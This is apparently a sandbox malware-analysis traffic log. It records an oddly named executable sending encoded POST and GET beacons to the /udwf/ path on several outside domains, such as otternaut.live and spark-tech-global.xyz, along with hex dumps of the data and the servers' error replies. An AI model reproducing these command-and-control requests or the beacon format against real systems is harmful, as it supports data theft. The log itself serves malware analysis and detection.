G0Yxd2Q=kdiO9dFLk3fHFNvmcYsfX5uVwk2pGYFhoqsoup0Kd6G84MfGLWj3BIQ4dGfNKSnsskj53f+L9ssZ7bPlq+Sk5L1sIzXgLcuRg9/EoFLSG7awAXdX3+mvxI1TzFhI+WWaktVIMyUDHzPMXfQeqhg8T2XnFYRS/vEUv3gnNK2AZcUdiAgw3i0/btXjPMvxgyxJasu147sCKXIqVHvowklcYge6J0i51Lp3J1qXfvq3os05Jz5oyuKi+42EImAWzOypo9eq1E93bsh8UycMAOQHp2vUiFH8WYQps9Cga94XTcFm59E+F7L2aR5ZnLNP0quB097eB10jtB0RXshKC5JGd7784+egiBQgFnSWIjneZ2tdIDdSkCiImvCgZXK62NQticSNXXfSYJF4eAoSpn0zwAstfPlJ71yVUhlhiqoxxlJQFZrutkyDo/Bnab6VzIllSsqF9wkIjaSOii2t2fdlxOLnYWrJMt6ygHNI3cqa9lRr+YuyJiupE7254I39gtEcnOdsVLBquAlgD3Kpc0mfcCcg98k+1A/HaRkJtAOKdOA9oGL+74wAFvXx3zSC/iLNjXhEGfWsVqn2xplGpr6h0Xp1T1fkA8yUyBHttvB0iryEOW2X/ddHcvi7Z7eflZnXR07JEer8ViBVMD7GprZckWAryTDsmBsoOGE89kmbjzdCEsCIfqztOa19PYTQUSmsh0BFEJFJLN3Ri4YeyZ2CX6MV2e03MSsXnUoX7pwSWJz+obXqik095URrxe/6Exp8qM81j1teG7WBJ+k55tQAd/45yzKtKIT71oPr8BHTQYw2sxCZCMYfcWCJ1vkShltqdWMrjJFAKNcHisPQaSCgfjfCx39y1monxKKisG3z8qJEImF4Lu2+tfeexv2avatOk9VyWzxNMFgGO4cYgJ8UL4mATFejflgt+9cWbYvXifdox70Rj9fa/aIdMEiQ5m0DEIV0VqHgNSdmk9DRyxSGD/x+16OKCVqpUUpzMPzR2remW10fkO7kiLj06l6wL1VMViwcLkL9DOmnW/uL4EfuTbYwWOcGDtmsbXjWUcW3zgUxi4pP15OqQZAL15wPDPBmrnv6yk0+G7dGaSUDWWBwkjUcagTm9FhkjGFLnCPQjHyBXiclQzzGe5XFnirFI8g11qT9mmkU29BWtH/Fzy7Q8T50di6dZviJW4LNqBWXnhnnHBUIN9Uvmi1LCnYv
                                                                                                                            Nov 10, 2023 09:28:51.456449032 CET209INHTTP/1.1 404 Not Found
                                                                                                                            Date: Fri, 10 Nov 2023 08:28:51 GMT
                                                                                                                            Server: Apache
                                                                                                                            Content-Length: 389
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/html
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            2192.168.2.104971623.227.38.7480C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            Nov 10, 2023 09:27:48.029633999 CET89OUTPOST /udwf/ HTTP/1.1
                                                                                                                            Host: www.littlehappiez.com
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.littlehappiez.com
                                                                                                                            Referer: http://www.littlehappiez.com/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 208
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Raw: 47 30 59 78 64 32 51 3d 51 31 2f 6c 4d 2b 73 36 4f 59 33 6a 65 71 78 2f 77 4d 69 61 62 68 49 57 75 52 47 63 4c 47 4b 37 47 6b 68 53 36 44 47 64 6a 4d 65 6c 7a 4e 46 6c 4f 72 4b 68 6a 51 53 42 56 4f 38 48 52 66 51 75 5a 46 30 54 53 76 4a 6c 76 67 66 70 51 45 4a 33 33 2f 36 63 68 72 72 43 34 34 45 75 54 7a 4b 75 63 50 32 63 6f 50 5a 34 6c 59 78 38 61 49 4e 44 36 63 49 4b 37 6b 53 75 70 57 32 62 6e 66 6e 4e 6a 59 46 74 56 33 55 73 4e 61 62 61 33 61 4a 33 71 65 78 37 6e 32 78 4d 75 33 4d 32 33 44 2b 46 71 75 57 4b 5a 74 4a 7a 36 4b 70 63 38 57 64 54 6e 52 2b 2f 70 78 7a 35 74 61 59 45 43 4d 6e 74 61 2f 79 31 34 72 38 3d
                                                                                                                            Data Ascii: G0Yxd2Q=Q1/lM+s6OY3jeqx/wMiabhIWuRGcLGK7GkhS6DGdjMelzNFlOrKhjQSBVO8HRfQuZF0TSvJlvgfpQEJ33/6chrrC44EuTzKucP2coPZ4lYx8aIND6cIK7kSupW2bnfnNjYFtV3UsNaba3aJ3qex7n2xMu3M23D+FquWKZtJz6Kpc8WdTnR+/pxz5taYECMnta/y14r8=
                                                                                                                            Nov 10, 2023 09:27:48.808260918 CET90INHTTP/1.1 404 Not Found
                                                                                                                            Date: Fri, 10 Nov 2023 08:27:48 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            X-Sorting-Hat-PodId: 293
                                                                                                                            X-Sorting-Hat-ShopId: 83935199526
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-ShopId: 83935199526
                                                                                                                            X-ShardId: 293
                                                                                                                            Content-Language: en-US
                                                                                                                            Set-Cookie: localization=US; path=/; expires=Sun, 10 Nov 2024 08:27:48 GMT; SameSite=Lax
                                                                                                                            Set-Cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22merchant_geo%22%3A%22USMA%22%2C%22sale_of_data_region%22%3Afalse%7D; domain=littlehappiez.com; path=/; expires=Sat, 11 Nov 2023 08:27:48 GMT; SameSite=Lax
                                                                                                                            Set-Cookie: _shopify_y=1c95b64a-cbaf-4aa7-b895-a0d261c3e83b; Expires=Sat, 09-Nov-24 08:27:48 GMT; Domain=littlehappiez.com; Path=/; SameSite=Lax
                                                                                                                            Set-Cookie: _shopify_s=589267fe-b53a-4fab-acae-faae851dc44c; Expires=Fri, 10-Nov-23 08:57:48 GMT; Domain=littlehappiez.com; Path=/; SameSite=Lax
                                                                                                                            Server-Timing: processing;dur=426
                                                                                                                            X-Shopify-Stage: production
                                                                                                                            Content-Security-Policy: ; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=1e7f5e7f-acb5-464
                                                                                                                            Data Raw:
                                                                                                                            Data Ascii:
                                                                                                                            Nov 10, 2023 09:27:48.808281898 CET91INData Raw: 2d 39 66 30 39 2d 35 36 35 38 33 30 30 66 39 37 36 38 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a 20 6e 6f 73 6e 69 66 66 0d 0a 58 2d 44 6f 77 6e 6c 6f 61 64 2d 4f 70 74 69 6f 6e 73 3a 20 6e 6f 6f 70 65 6e 0d 0a 58
                                                                                                                            Data Ascii: -9f09-5658300f9768X-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontrol
                                                                                                                            Nov 10, 2023 09:27:48.808290005 CET93INData Raw: 36 37 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 95 58 5b 6f db 36 14 7e ef af e0 54 0c 68 07 dd 29 5b b6 2a a7 6b d3 76 1b 90 76 c5 3a 60 d8 de 68 89 b6 d8 c8 a2 46 d1 76 d2 a2 ff 7d 87 a4 28 4b 89 d3 ae 09 1a f3 72 ae df b9 f0 b8 f9 0f af 7e bf fc
                                                                                                                            Data Ascii: 679X[o6~Th)[*kvv:`hFv}(Kr~Q%w\}4CGPR^<B(QIPQQrr-.$5Hs85dGW**x#irzP@KmMmV]:@B?hEIE>C;"Q%kj'oo}RG\|/Z]
                                                                                                                            Nov 10, 2023 09:27:48.808305025 CET93INData Raw: 8c 18 81 16 bc 9c 59 a6 d0 8f 63 90 60 e4 5d 4d cc 9a ee fe 71 74 22 7e d0 09 38 4e c5 c7 af 97 2f 5f 63 95 22 e6 4a b7 de 95 13 0f 07 ea b1 f9 c8 19 54 99 9e 6e 9d 8b 3c 50 38 7c 1b 24 70 3d 9d b9 f1 02 5d da 95 bf 9c cf 15 3e f0 e1 c6 00 d3 0c
                                                                                                                            Data Ascii: Yc`]Mqt"~8N/_c"JTn<P8|$p=]>6BblS?VfAs r^aV$/MYspc1AvrX_E }y=grH6VujfTq.>pZA)"n>9xdvya*|tVt
                                                                                                                            Nov 10, 2023 09:27:48.808312893 CET93INData Raw: 30 0d 0a 0d 0a
                                                                                                                            Data Ascii: 0


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            20192.168.2.1049735162.0.222.11980C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            Nov 10, 2023 09:28:53.881416082 CET209OUTGET /udwf/?G0Yxd2Q=pfKu+pVNsln4G6X0TIcdarC36EKmJps8u6QQpqwTd4K74JvWDy/kIYo7R3ufamPFtUrh+tiM68Q084b5gYWBh8dmFEHsBv37jg==&vhQT=aV8PeNo0MvDl1 HTTP/1.1
                                                                                                                            Host: www.spark-tech-global.xyz
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Nov 10, 2023 09:28:54.178764105 CET210INHTTP/1.1 404 Not Found
                                                                                                                            Date: Fri, 10 Nov 2023 08:28:53 GMT
                                                                                                                            Server: Apache
                                                                                                                            Content-Length: 389
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            21192.168.2.104973691.195.240.1980C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            Nov 10, 2023 09:28:59.698246956 CET211OUTPOST /udwf/ HTTP/1.1
                                                                                                                            Host: www.otternaut.live
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.otternaut.live
                                                                                                                            Referer: http://www.otternaut.live/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 188
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Raw: 47 30 59 78 64 32 51 3d 6b 62 51 6e 63 65 2b 76 75 51 34 6c 45 69 52 64 46 46 74 76 42 50 6e 58 52 33 71 4e 47 5a 57 6d 2b 34 50 76 58 75 2f 76 36 6e 38 4b 2b 4f 62 31 47 31 43 56 65 63 50 76 78 53 49 77 6b 34 61 4d 6a 39 6e 52 71 36 34 6d 53 49 4a 79 43 64 57 72 39 41 43 57 53 69 66 34 51 58 4a 63 41 6d 4f 6a 33 6d 32 76 63 2f 4e 6b 62 70 65 59 31 59 46 52 49 47 4d 44 50 42 57 63 2b 45 70 75 49 73 64 6b 35 61 57 79 2b 67 2f 45 63 4e 6a 39 4f 6e 50 47 56 54 31 4d 6c 54 73 6b 58 66 37 36 2b 5a 62 79 74 31 66 53 77 48 34 4e 67 50 6e 47 5a 56 79 33 58 77 3d 3d
                                                                                                                            Data Ascii: G0Yxd2Q=kbQnce+vuQ4lEiRdFFtvBPnXR3qNGZWm+4PvXu/v6n8K+Ob1G1CVecPvxSIwk4aMj9nRq64mSIJyCdWr9ACWSif4QXJcAmOj3m2vc/NkbpeY1YFRIGMDPBWc+EpuIsdk5aWy+g/EcNj9OnPGVT1MlTskXf76+Zbyt1fSwH4NgPnGZVy3Xw==
                                                                                                                            Nov 10, 2023 09:29:00.005218029 CET212INHTTP/1.1 405 Not Allowed
                                                                                                                            date: Fri, 10 Nov 2023 08:28:59 GMT
                                                                                                                            content-type: text/html
                                                                                                                            content-length: 154
                                                                                                                            server: NginX
                                                                                                                            connection: close
                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            22192.168.2.104973791.195.240.1980C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            Nov 10, 2023 09:29:02.526262999 CET213OUTPOST /udwf/ HTTP/1.1
                                                                                                                            Host: www.otternaut.live
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.otternaut.live
                                                                                                                            Referer: http://www.otternaut.live/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 208
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Raw: 47 30 59 78 64 32 51 3d 6b 62 51 6e 63 65 2b 76 75 51 34 6c 45 43 42 64 44 69 78 76 47 76 6e 55 53 33 71 4e 66 4a 57 71 2b 34 44 76 58 76 37 2f 36 56 6f 4b 2b 73 54 31 55 68 75 56 53 38 50 76 2b 79 49 2f 71 59 62 43 6a 39 72 6e 71 34 73 6d 53 49 4e 79 43 5a 61 72 2b 7a 71 56 53 79 66 36 4a 48 4a 65 45 6d 4f 6a 33 6d 32 76 63 2f 4a 43 62 70 57 59 30 6f 56 52 4c 6e 4d 41 4d 42 57 54 39 45 70 75 65 63 64 67 35 61 58 52 2b 68 7a 69 63 4c 6e 39 4f 6d 2f 47 56 42 4e 54 76 54 73 6d 4b 50 36 2f 32 49 75 4a 75 31 50 75 78 48 67 4e 33 6f 57 6c 59 41 65 6b 51 4a 70 64 48 45 34 69 59 74 53 50 62 67 7a 66 4e 71 43 76 4e 33 6b 3d
                                                                                                                            Data Ascii: G0Yxd2Q=kbQnce+vuQ4lECBdDixvGvnUS3qNfJWq+4DvXv7/6VoK+sT1UhuVS8Pv+yI/qYbCj9rnq4smSINyCZar+zqVSyf6JHJeEmOj3m2vc/JCbpWY0oVRLnMAMBWT9Epuecdg5aXR+hzicLn9Om/GVBNTvTsmKP6/2IuJu1PuxHgN3oWlYAekQJpdHE4iYtSPbgzfNqCvN3k=
                                                                                                                            Nov 10, 2023 09:29:02.832225084 CET213INHTTP/1.1 405 Not Allowed
                                                                                                                            date: Fri, 10 Nov 2023 08:29:02 GMT
                                                                                                                            content-type: text/html
                                                                                                                            content-length: 154
                                                                                                                            server: NginX
                                                                                                                            connection: close
                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            23192.168.2.104973891.195.240.1980C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            Nov 10, 2023 09:29:05.356878042 CET215OUTPOST /udwf/ HTTP/1.1
                                                                                                                            Host: www.otternaut.live
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.otternaut.live
                                                                                                                            Referer: http://www.otternaut.live/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 1220
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Raw: 47 30 59 78 64 32 51 3d 6b 62 51 6e 63 65 2b 76 75 51 34 6c 45 43 42 64 44 69 78 76 47 76 6e 55 53 33 71 4e 66 4a 57 71 2b 34 44 76 58 76 37 2f 36 56 77 4b 35 66 4c 31 47 51 75 56 52 38 50 76 33 53 4a 34 71 59 62 50 6a 38 43 75 71 34 68 54 53 4c 6c 79 45 4d 47 72 71 53 71 56 64 79 66 36 55 58 4a 66 41 6d 50 68 33 6e 47 52 63 2f 5a 43 62 70 57 59 30 71 64 52 64 47 4d 41 42 68 57 63 2b 45 70 59 49 73 64 49 35 65 79 71 2b 68 33 55 64 37 48 39 58 47 76 47 5a 53 31 54 74 7a 73 65 5a 2f 36 5a 32 49 79 57 75 31 54 4d 78 47 6b 72 33 75 6d 6c 64 6d 66 7a 46 64 5a 4a 63 47 55 4b 62 2b 53 74 4c 56 79 73 55 62 71 2f 4f 41 2f 30 77 78 64 6d 61 49 41 4f 31 76 2b 79 65 6f 5a 39 31 65 50 58 4d 33 68 41 74 49 41 4a 42 58 48 67 73 59 47 76 6a 4f 53 61 30 74 71 45 32 39 4d 47 56 72 4f 59 7a 32 77 68 66 30 79 62 44 4c 42 2f 4b 6c 64 6f 65 56 44 72 4a 6a 78 71 6f 70 55 51 55 6b 53 76 76 59 6f 4e 4b 6e 77 4a 39 6e 6c 71 42 61 45 48 73 31 52 4a 6a 75 36 64 4f 45 47 55 75 71 67 52 54 33 71 30 73 52 6e 4a 4e 39 38 44 2f 33 44 6c 65 61 79 79 37 42 75 34 5a 31 4a 36 72 57 35 45 44 54 70 6a 45 37 4d 4e 4d 71 63 36 37 69 4a 37 34 52 31 30 44 57 2f 6d 30 62 45 36 74 5a 2f 63 48 75 56 44 4f 6b 61 34 37 6b 79 6d 6b 6f 62 42 6c 31 74 30 71 62 50 68 72 43 4a 54 37 71 4a 2b 50 2f 33 36 2f 51 4e 56 78 4b 65 36 45 44 73 74 65 72 36 55 53 53 2f 35 61 71 49 69 4c 6e 33 46 53 76 49 58 4d 67 61 65 76 4f 43 42 31 57 4f 62 68 64 4a 4c 59 67 75 55 6a 4c 36 50 7a 4b 58 64 47 77 46 57 78 35 37 72 63 2b 66 68 55 46 74 66 61 31 4f 71 77 2b 49 75 6d 70 32 51 77 33 4c 34 58 46 76 4d 43 74 65 61 57 32 5a 79 42 65 51 71 30 50 53 35 4a 73 63 68 50 64 78 4b 41 57 55 4f 69 54 7a 76 4c 43 72 47 4d 44 4c 50 71 6c 7a 39 33 45 49 51 4b 4b 41 45 68 52 30 78 35 7a 6c 36 45 4b 75 6e 58 52 39 47 53 63 4f 64 6e 33 77 34 73 6d 46 6c 38 73 37 4c 49 6b 66 78 61 68 69 7a 72 72 4e 36 2b 72 33 51 6d 37 68 71 50 34 78 6e 63 57 46 69 39 57 77 5a 65 32 68 2f 66 78 66 73 7a 64 61 2b 71 57 56 55 59 75 46 51 34 34 46 70 61 33 75 6a 6b 58 70 77 36 78 50 79 72 35 37 2f 39 43 7a 38 6a 46 2b 55 54 69 2b 66 4e 50 42 77 76 54 44 78 45 58 37 4e 78 44 53 71 75 39 50 7a 53 46 51 49 5a 45 65 74 52 76 2f 50 57 5a 37 63 46 6a 50 71 65 36 2f 45 30 4b 72 7a 63 78 41 36 67 46 39 33 51 41 34 64 34 2b 36 76 56 33 69 52 4b 54 64 62 64 56 51 47 71 52 76 48 71 63 62 57 37 44 68 6b 71 6e 72 48 64 62 70 6b 79 31 48 36 34 4b 52 49 51 32 56 4b 41 74 55 65 48 6a 71 55 68 50 44 4e 4f 31 6a 6c 77 56 2b 43 70 78 48 54 70 35 71 4c 34 51 67 54 71 47 30 71 34 6d 38 4b 57 57 64 32 43 4b 53 6c 4c 4b 51 52 42 4f 64 7a 50 39 64 70 61 54 49 55 6b 37 71 45 65 79 65 44 6d 41 37 76 61 5a 4b 59 57 31 2b 38 4a 36 79 73 64 34 6c 53 4c 33 78 63 75 31 43 62 52 38 66 4a 73 35 4d 71 38 43 32 33 72 6c 39 57 50 6a 54 75 4c 2b 39 67 59 6c 33 69 6d 2b 74 5a 58 52 66 4a 46 41 57 39 65 70 6a 58 30 6b 46 37 76 75 61 71 67 6c 4c 56 47 62 75 66 47 4a 74 7a 32 52 4b 4d 2b 45 61 54 4a 57 41 73 75 57 49 6b 2f 4c 39 43 58 62 35 50 48 78 55 66 62 30 42 79 56 4f 30 46 7a 49 6b 44 69 73 63 69 70 6d 4d 2b 44 72 34 4a 6f 78 2f 57 55 6a 4f 41 77 4f 47 61 53 44 76 4d 61 41 37 76 35 4b 50 55 57 44 4b 74 6d 2b 71 6b 4c 4c 69 7a 71 73 78 70 57 47 6f 51 37 41 4c 6b 58 6a 57 51 64 49 4a 6e 35 57 62 42 7a 6f 6e 46 2f 58 78 4d 32 63 4e 50 36 41 44 47 77 58 71 63 59 46 69 73 41 30 6b 55 38 77 67 2b 37 41 74 66 38 51 5a 4f 78 74 6b 54 70 70 58 65 56 2f 74 68 31 65 56 61 2f 76 43 5a 36 35 41 30 2b 2f 47 65 4e 52 54 76 77 4e 77 53 47 52 33 78 6d 42 67 61 5a 2f 53 6b 52 62 36 4c 6a 35 49 69 62 2f 4d 53 73 52 56 56 4c 39 46 4c 59 30 41 35 65 5a 33 73 67 35 4e 66 43 4c 70 50 77 36 4f 48 65 4e 36 6c 4f 4c 61 5a 31 6e 59 2f 55 6a 59 34 55 79 69 7a
